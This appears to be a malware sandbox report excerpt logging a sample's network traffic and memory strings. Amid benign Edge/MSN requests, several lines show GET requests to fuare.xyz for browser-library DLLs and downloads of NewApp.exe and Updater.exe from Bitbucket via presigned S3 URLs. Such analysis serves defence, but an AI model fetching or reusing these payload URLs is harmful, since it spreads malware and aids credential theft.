                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1t99ka.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=30E4D63EBE466C3F34FBC309BFE76DD6&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308|10837393&bcnt=1|1&asid=7c40540d2588477f914f74ded1caefa6 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=30E4D63EBE466C3F34FBC309BFE76DD6; _EDGE_S=F=1&SID=3565577F2E976350116642482FC062E4; _EDGE_V=1
                        Source: global trafficHTTP traffic detected: GET /b2?rn=1731594383156&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=30E4D63EBE466C3F34FBC309BFE76DD6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=152cfdac7dc4a884c04f22f1731594385; XID=152cfdac7dc4a884c04f22f1731594385
                        Source: global traffic; HTTP traffic detected: GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: fuare.xyz Connection: Keep-Alive Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=30E4D63EBE466C3F34FBC309BFE76DD6&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=e8fc50c330444906fac19f62c05cf341 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=30E4D63EBE466C3F34FBC309BFE76DD6; _EDGE_S=F=1&SID=3565577F2E976350116642482FC062E4; _EDGE_V=1
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA11MZ4M.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msyCD.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msyCF.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1731594383155&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=dd33d61a7826467984fdc77d7a858fcd&activityId=dd33d61a7826467984fdc77d7a858fcd&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=3AF1D6A98A344C6DBE6DC68D8AFF57E2&MUID=30E4D63EBE466C3F34FBC309BFE76DD6 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=30E4D63EBE466C3F34FBC309BFE76DD6; _EDGE_S=F=1&SID=3565577F2E976350116642482FC062E4; _EDGE_V=1; SM=T; _C_ETH=1; msnup=
                        Source: global traffic; HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: fuare.xyz Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic; HTTP traffic detected: GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: fuare.xyz Connection: Keep-Alive Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global traffic; HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: fuare.xyz Connection: Keep-Alive Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732199177&P2=404&P3=2&P4=S%2fDMU7bCQ%2fUcrfbaKo5rz8U9dz0MCzP5ofjnHfrGaxK8ErtvWEbZxqsR1lYx2Af08PoA4aAnZDyElailtrjESw%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: C0uqo8vFe1xTufpnD76ikNSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                        Source: global traffic; HTTP traffic detected: GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: fuare.xyz Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic; HTTP traffic detected: GET /jhg1a/yujth/downloads/NewApp.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: bitbucket.org Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /11775b90-6f69-4884-847d-757e205605be/downloads/08b6d961-2cc7-4641-9f33-146b04169e8f/NewApp.exe?response-content-disposition=attachment%3B%20filename%3D%22NewApp.exe%22&AWSAccessKeyId=ASIA6KOSE3BNI2VJZ3YN&Signature=9IsFErXJsqs0tpcA8pBBfOEMZlU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGcaCXVzLWVhc3QtMSJHMEUCIQDrU%2Biy0SAH5tqalsyFBagoc1kfdg7MAL4LTeKLZfW7fAIgYN5hZAlvhbxNlEWFoE5P47K08myL3CMPWKphpCUDzdkqsAII8P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDByhjIF16%2F%2BR79Z6sCqEAoYYxIHs3MaGKPTDy%2F1pP7DcUzEObRIi4W%2BleEaqVGr6uO5uw6TKmjx6hAlakaDJq3wXadqsM8WqZFsQ%2FxATIXbljhq1ZHCzYgjU5xmyBt7Z%2FAOENOyqsRaR61RJFaMW1w61daCKj%2FBQC8mJmadE6aczB3KXJyJFy906hV8vTFfiArES9OHqkjZp7ppefO3I8KND9Ug8c1PmPhCvmzcD6llNfNVTMvSCAGbKHcAFYm%2F2roYTCce1WpgsmMIpHbP0lkcRyiWQMCGowLKawtWcVyBeNfN2panrTOeE7T6ciyjsDjF1C5b8uhB2jywnZvLT9EAJqkQR4H9LccDrPEZg26UQYTiyMKmR2LkGOp0BsBQSdZibwlMfuLK%2FerADLggjWr5OYo0DlYGURT%2BfZVkkBTSzvdOO1VYavxFAVUi0hE%2FUv0ghL7OYBA9128S%2FK%2FvufMqn0Bl3%2B9SrGJlAy6T6ciYdS5baULlxfWUDItdkdNOAJL96mTn52c5l%2ByZ9rBVWW%2F7eR7nT5cdfNiwXCHqM%2Fo4GDmn7%2BNnEZAQV4irmK7%2BhcfUdjN5DwY2aUQ%3D%3D&Expires=1731596210 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Cache-Control: no-cacheHost: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                        Source: global traffic; HTTP traffic detected: GET /jhg1a/yujth/downloads/Updater.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: bitbucket.org Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /11775b90-6f69-4884-847d-757e205605be/downloads/bdcb8c2b-056c-4c51-82db-773796c63469/Updater.exe?response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22&AWSAccessKeyId=ASIA6KOSE3BNOGQUBCOB&Signature=LQD6OSo%2FQqLL%2BqhVbUtUrhb8AwY%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGcaCXVzLWVhc3QtMSJHMEUCIQCYL%2FIr457%2BJHjf%2BCW9uyibyLJPAi0WdhOi3c4K%2F1kTMQIgNE0WSWLJOhUG51RYqBOrOrLJOowLfJQLhtoe14xz4%2FcqsAII8P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDHwYPqBIbx9aG%2BJEXiqEAgD6JVGyeeHH9SOCtf0929BkPGpNVJiPuesarSRyM1IHXarvPzVgRsR5i2apJOM6L3Sw1%2FhC62PiHMatqH7h8N%2FX%2BjJePY6a29v8oOk1I4VkMpPRz1TEa5A9BpM0lfi0H%2BqM1VnkPCDsaBinrp73FoTWoCwcBXPZB3jDaYCzBrhXl30n5r5yeNFNKbRW5DglOBjKk%2B4Knol%2BbduyzastaSfO7NMSJA7VzZWRj1eTpVSGeACjd27ehFCSuc5BcO72TAyPN%2BRi4WqWz%2FHjyCD6YEHj0e1tVrWEDdUuqhoxxfGFHiUiGG00FsVOA%2F770hGS51wdY%2FE%2FxwQwczmGGpEIUdWn2p04MLWR2LkGOp0BqGBcsuvyiQwhxY62OPl4Bls2yGPVO4OEMgA8o1Xbk0nwJOZ7pOtPH8o3baJBFIfAHeI436BZxgg3tzNYqcIMn60718eAmDWgYWK1SjSP%2BmYdcjqQQxDrd%2B5LqISd79mLUgkKSXRYpdudl2CmVhlkVFZiyYZ%2B%2FSVzg11fenM0fvEgsa9kOSGoNk2mpf%2Bb4wI76lf%2FItncBrWCT2f1YQ%3D%3D&Expires=1731596222 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Cache-Control: no-cacheHost: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                        Source: chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739009563.000007C000DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2733918596.000007C000668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: /www.youtube.com/J equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2733918596.000007C000668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739009563.000007C000DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000003.2653607208.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2653714391.000007C000FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2653771059.000007C000F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style 
include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                        Source: chrome.exe, 00000005.00000002.2733918596.000007C000668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ht/www.youtube.com/J equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2742895899.000007C001690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2742895899.000007C001690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/) equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739009563.000007C000DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2739080303.000007C000DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2741038731.000007C0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2741038731.000007C0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcaogl equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739009563.000007C000DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2675997839.000007C00129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlP equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt equals www.youtube.com (Youtube)
                        Source: chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                        Source: global traffic - DNS traffic detected: DNS query: t.me
                        Source: global traffic - DNS traffic detected: DNS query: fuare.xyz
                        Source: global traffic - DNS traffic detected: DNS query: www.google.com
                        Source: global traffic - DNS traffic detected: DNS query: apis.google.com
                        Source: global traffic - DNS traffic detected: DNS query: ntp.msn.com
                        Source: global traffic - DNS traffic detected: DNS query: bzib.nelreports.net
